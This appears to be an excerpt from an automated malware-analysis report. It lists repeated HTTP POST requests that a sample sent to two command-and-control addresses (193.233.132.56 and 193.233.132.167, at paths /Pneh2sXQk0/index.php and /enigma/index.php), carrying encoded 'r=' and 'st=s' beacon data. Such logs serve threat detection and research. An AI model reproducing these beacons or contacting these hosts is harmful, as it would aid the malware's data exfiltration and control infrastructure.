Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
